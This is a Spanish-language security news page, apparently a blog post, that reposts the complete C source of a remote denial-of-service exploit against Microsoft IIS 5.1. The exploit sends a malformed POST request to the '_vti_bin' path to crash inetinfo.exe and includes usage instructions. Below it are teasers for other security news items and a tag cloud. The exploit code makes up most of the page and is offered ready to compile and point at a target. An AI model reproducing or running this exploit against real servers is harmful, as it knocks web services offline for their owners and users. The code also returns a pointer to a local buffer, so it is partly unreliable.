Exploit contra el Microsoft IIS


Exploit publicado en frsirt.com que ataca el Internet Information Server (ISS) usando HTTP mal formados causando una denegación de servivios, realizado por ATmaCA, Inge Henriksen del sitio web spyinstructors.com.





Enlace relacionado:
http://www.xombra.com/go_news.php?articulo=2119

Advisory ID : FrSIRT/ADV-2005-2963
Rated as : Moderate Risk

/*****************************************************************

Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Vulnerable:
Microsoft Internet Information Server® V5.1

Not vulnerable:
Microsoft Internet Information Server® V5.0
Microsoft Internet Information Server® V6.0

Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.

inetinfo.exe will be crashed after exploitation finished successfuly.

Usage: iis51dos.exe [Target Url or IP]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")


char *HttpHeader(char *pszHost)
{
char szHeader[1000];

wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n"
"Content-Length: 0\r\n\r\n"
, pszHost
);

return szHeader;
}


int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
"Bug Discovered by: Inge Henriksen\n"
"Exploit Coded by: Kozan\n"
"Credits to ATmaCA, Inge Henriksen\n"
"www.spyinstructors.com - kozan@spyinstructors.com\n\n"
);

if( argc != 2 )
{
fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
return -1;
}

WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;

char szHeader[1000], szWebUrl[1000];

lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));

if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}

sock = socket(AF_INET,SOCK_STREAM,0);

if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}

if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!\n");
return -1;
}

memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '\0', 8);

fprintf(stdout, "Please wait while connecting...\n");

if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Connected.\n\n");

fprintf(stdout, "Please wait while sending DoS request headers...\n\n");

for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...\n", i+1);

if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
closesocket(sock);
return -1;
}

fprintf(stdout, "%d. request sent.\n\n", i+1);
}

fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();


return 0;
}



Otras noticias de interés:

Vulnerabilidad en el Centro de Software de #Ubuntu
Canonical, desarrolladora de Ubuntu, ha corregido recientemente una vulnerabilidad presente en su Centro de Software, destinado a la descarga, instalación y gestión centralizada de aplicaciones por parte del usuario....
Un año emblemático para problemas de seguridad
Todavía no ha finalizado, no obstante el 2006 es ya un año record en lo que respecta a vulnerabilidades en seguridad. Hay sin embargo una esperanza: solo una pequeña parte de estos errores son de alto riesgo....
¿ Windows 2000 mejor que XP ?.
Consegui este artículo y me parece que mucha gente se ha preguntado, ahora bien en lo particular XP no me gusta para nada. Participa en la encuesta de este Site....
Bienvenido al I Reto de Autenticación Web.
El objetivo de este reto consiste en poner a prueba tus habilidades para saltarte los mecanismos de autenticación en aplicaciones Web en Internet. ...
EEUU buscan endurecer su lucha contra el ciberespionaje
En medio de la escalada de tensión con China, un conjunto de senadores propuso una ley para combatir el espionaje informático a empresas del país....
Forma simple de probar los ordenadores cuánticos
Físicos de Canadá han inventado una nueva forma de probar los componentes ópticos que podrían algún día usarse para construir ordenadores cuánticos. Afirman que su técnica es mucho más simple que las pruebas convencionales porque usa una luz...
Netware uno de los SO más seguros presenta Vulnerabilidad FTP SERVER
Se ha publicado recientemente una vulnerabilidad de denegación de servicio sobre Netware FTP Server. El servidor FTP de Netware, se ve afectado por una vulnerabilidad por la que un atacante podría causar una denegación de se...
Diagnosticar los problemas de aplicación principal desafío para los responsables de red
Los responsables de red encargados de la localización y resolución de problemas de rendimiento afirman su dificultad a la hora de separar los problemas relacionados con la red de los relacionados con las aplicación, así lo afirma una encuesta rea...
Dos vulnerabilidades en OpenOffice
Se han anunciado dos vulnerabilidades en OpenOffice.org, que podrían permitir a un atacante evitar restricciones de seguridad o comprometer los sistemas afectados....
Aparece Xombre, un nuevo virus tras una actualización de Windows
Empresas se seguridad informática han informado de la aparición de Xombre, un nuevo virus informático que simula ser una actualización de seguridad para Windows XP....

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • iis
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra